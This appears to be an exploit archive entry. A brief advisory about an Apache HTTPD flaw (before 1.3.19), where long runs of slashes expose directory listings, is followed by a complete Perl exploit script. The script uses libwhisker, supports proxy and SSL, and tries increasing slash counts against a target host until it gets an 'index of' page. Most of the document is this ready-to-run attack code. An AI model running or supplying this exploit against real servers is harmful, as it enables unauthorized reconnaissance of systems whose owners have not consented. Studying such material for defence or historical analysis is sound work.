source: Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # then modified by Siberian ( # with more modifications by rfp ( # ########################################################################## use libwhisker; use Getopt::Std; # # this exploit was modified to use the libwhisker library, which gives # HTTP/1.1, proxy, and SSL support. Plus, small other changes. $|++; my (%hin,%hout,%args); print "Apache Artificially Long Slash Path Directory Listing Exploit\n"; print "SecurityFocus BID 2503\n\n"; print "Original exploit code written by Matt Watchinski (\n"; print "Rewritten and fixed by Siberian (\n"; print "Moved to libwhisker by rfp\n\n"; getopts("p:L:H:sP:R:h:",\%args); if($args{h} eq ''){ print 'Usage: ./ <options>, where options:',"\n"; print '-h host host to scan (must be specified)',"\n"; print '-p ## host port (default: 80)',"\n"; print '-L ## low end/start of range (default: 1)',"\n"; print '-H ## high end/end of range (default: 8192)',"\n"; print '-P host HTTP proxy via host',"\n"; print '-R ## HTTP proxy port (default: 80)',"\n"; print '-s use SSL (can\'t be used with proxy)',"\n"; exit 0; } $low = $args{L} || 1; $high = $args{H} || 8192; &lw::http_init_request(\%hin); # setup our request hash $hin{'whisker'}->{'host'}= $args{h}; $hin{'whisker'}->{'port'}= $args{p} || 80; if(defined $args{s}){ $hin{'whisker'}->{'ssl'} = 1; if(defined $args{P}){ print "SSL not currently compatible with proxy\n"; exit 1; } } if(defined $args{'P'}){ $hin{'whisker'}->{'proxy_host'}=$args{P}; $hin{'whisker'}->{'proxy_port'}=$args{R} || 80; print "Using proxy host $hin{'whisker'}->{'proxy_host'} on "; print "port $hin{'whisker'}->{'proxy_port'}\n"; } &lw::http_fixup_request(\%hin); # fix any HTTP requirements for($c=$low; $c<=$high; $c++){ $hin{'whisker'}->{'uri'} = '/' x $c; if(&lw::http_do_request(\%hin,\%hout)){ print "Error: $hout{'whisker'}->{'error'}\n"; exit 1; } else { if($hout{'whisker'}->{'http_resp'} == 200 && $hout{'whisker'}->{'data'}=~/index of/i){ print "Found result using $c slashes.\n"; exit 0; } } print "."; # for status } print "\nNot vulnerable (perhaps try a different range).\n";